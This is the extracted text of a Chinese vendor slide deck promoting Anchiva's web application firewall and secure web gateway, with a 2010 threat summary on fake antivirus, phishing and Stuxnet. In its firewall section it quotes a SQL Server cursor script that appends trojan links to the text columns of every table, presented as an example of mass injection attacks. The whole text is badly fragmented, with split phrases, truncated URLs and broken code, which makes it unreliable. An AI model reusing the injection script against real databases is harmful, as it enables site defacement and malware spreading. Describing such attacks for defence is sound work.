Anchiva产品介绍

单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,Copyright2006-2009 Anchiva Systems Ltd.All rights reserved.,-净化、防护您的网络应用,安全网关系列,Secure and Manage Your Network Access,安信华科技有限公司专业从事硬件应用安全网关的研发及销售；,公司总部位于北京清华科技园，杭州设有分公司；,管理、研发团队来自：,Cisco,Juniper/,NetScreen,IronPort,TrendMicro,F,ortinet,；,具有,RapidRx,病毒实验室；,国际反病毒组织,Wildlist,成员之一；,公司简介,公司简介,自主研发业界首款集成,ASIC,硬件加速技术的安全网关；,优化重写,TCP,协议栈，打破传统操作系统基于,Kernel,的,TCP,协议,栈共享锁限制，真正实现多核并行处理；,产品具有,ICSA Gateway Anti-Virus,认证。从,06,年至今，通过,ICSA,所有的月度检测；,产品操作系统及病毒扫描引擎技术具有自主知识产权；,登记号：,2009SR018876,安启华安全网关操作系统软件,登记号：,2009SR018878,安启华病毒检测系统软件,相关资质,ANCHIVA 自主知识产权,WEB安全网关,操作系统,WEB安全网关集,中管理系统,WEB应用防火,墙操作系统,防病毒引擎,网关审计中心搜,索系统,综合威胁防御,升级管理系统,2010年中央政府采购网入围链接,防病毒网关,低端：,http:/ Server的注入挂马攻击,http:/ t varchar(255),c varchar(255),declare,table_cursor,cursor for,select,a.name,b.name,from,sysobjects,a,syscolumns,b where,a.id,=,b.id,and,a.xtype,=u and(,b.xtype,=99 or,b.xtype,=35 or,b.xtype,=231 or,b.xtype,=167),open,table_cursor,fetch next from,table_cursor,into,t,c,while(fetch_status,=0),begin,exec(update,+t+set+c+=,rtrim(convert(varchar,+c,+)+!-),fetch next from,table_cursor,into,t,c,end,close,table_cursor,deallocate,table_cursor,以上代码用来对所有表中的文本内容植入木马链接,产品功能应用-WAF,黑客篡改网页的主要手段-植入后门程序,攻击者可通过某些漏洞上传一个Webshell管理后门,通过该后门可执行批量挂马，系统提权等操作,Anchiva 产品解决方案,产品功能应用-WAF,产品部署在WEB数据中心的前端，根据不同的虚拟域，不同的WEB 服务特点和不同的代码特点，分别制定不同的个性化的安全访问策略，从而为众多虚拟域提供集中式、个性化的安全防护。,通过精确定义的攻击特征库、完善完善的Cookie安全机制、上传病毒检测、阻止登录已存在后门，来防止攻击者恶意篡改网页。,Web servers,Database,扫描检测web请求URL、URL参数、表单输入、Cookie内容等。,阻止动机不纯的扫描、防止信息意外泄漏,防,SQL,注入、,XSS,攻击、弱口令攻击、命令注入,防溢出攻击、完善,Cookie,安全机制,上传病毒检测、检测站点后门程序、挂马检测,SWG(,S,ecure,W,eb,G,ateway,)上网安全网关,产品功能应用-SWG,网络成为应用平台、交流媒介和商业工具后带来的风险,网络应用安全问题日益突出,病毒、木马、间谍软件、网络钓鱼、灰色软件、后门程序等随Web访问、电子邮件、FTP下载等进入企业内部网络。,企业重要服务器，被植入木马、网页遭受篡改,产品功能应用-SWG,Anchiva 2010年第三季度威胁报告摘要,说明:木马威胁仍然占大部分，间谍软件所占的比例与上季度相比大幅上升，从二季度的6.4%上升到20.2%,Anchiva截获各类Malware将近220万，间谍软件和蠕虫大幅上升,。,假冒杀毒软件传播猖獗，影响日益严重。,中国地区网站被广告马、黑链篡改情况严重。,用于篡改的恶意网站大多数利用免费域名转向服务,。,QQ,依然是钓鱼网站热衷，热门电视节目成为新宠。,产品功能应用-SWG,假冒杀毒软件大幅增长,目前，假冒的杀毒软件日益增长，已经占据全部恶意软件的15%。这些假冒的杀毒软件一般都假装对受害者的计算机进行扫描并且声称发现一些恶意软件。这时，假冒的杀毒软件便会要求用户付费以便清除这些不存在的恶意软件。无论用户是否付费，这些假冒的杀毒软件都可能安装更多的恶意软件,。,产品功能应用-SWG,钓鱼网站猖獗,钓鱼网站利用热门节目的知名度，通过邮件、论坛中的帖子等方式，通知受害者“中奖”信息，诱骗到钓鱼网站。该类网站，大多数情况下其域名会与相应欺骗的节目名称一致，用以迷惑不仔细的受害者。,产品功能应用-SWG,Stuxnet蠕虫病毒攻击传统工业,尽管Stuxnet蠕虫病毒此前一直存在，但是该病毒直到六月份才引起人们的关注。,这是一种专门攻击工业监控与数据采集(SCADA)系统恶意软件的一部分，其主要目标是伊朗的核设施。在十月份，该蠕虫病毒已经影响了伊 朗国内3万个系统。伊朗总裁内贾德在十一月份称：“伊朗的敌人利用电子部件中安装的软件的确对伊朗一部分浓缩铀离心机制造出了有限的麻烦。他们对我们做了坏事。”,产品功能应用-SWG,来自专业公司的分析,Gartner曾经在报告中指出“网络威胁环境在三年以前就发生了演变，而很多企业还在继续沿用10年以前的防护技术”。,著名病毒研究机构ICSA的统计表明，,93的病毒,来自网络传播。,Google发布的调查结果显示，网站成为恶意软件的温床，,1/10的网页,中存在恶意代码。,Google的恶意站点研究报告表明，中国的恶意站点占到了总数的,67%,。,产品功能应用-SWG,Anchiva 产品解决方案,LAN/Intranet,Servers,Malicious sites,过滤引擎,深度内容检测（,DCI,）与,Malware,特征匹配引擎,僵尸网络防护,监测分析并阻断：病毒、木马、蠕虫、间谍软件、恶意代码等进出企业内部网络,Network User,三大过滤引擎，提供实时、主动的anti-malware,网络边界,Internet,DMZ,双向检测,产品功能应用-SWG,Malicious Sites过滤引擎,Google,恶意站,点数据库,Anchiva,恶意站点,数据库,恶意站点监控系统,站点元素,IP,地址,域名,代码,URL,Anchiva RapidRx威胁处理中心,过滤阻断,malware,发布源,防钓鱼,阻止间谍软件回传,过滤分块下载中的,malware,产品功能应用-SWG,功能全面不以牺牲性能为代价,多引擎并行处理,具有第三方认证,ASIC 硬件加速,多核硬件平台,完全并发TCP协议栈,扫描性能,成倍增长,随着硬件的升级，,性能呈线性增长,灵活可扩展的,AnchivaOS,高性能,Malware,检测网关,产品功能应用-SWG,最新通过ICSA认证的病毒网关产品：,在ICSA进行的所有月度测试中,Anchiva web安全网关至今为止全部通过。,Thanks,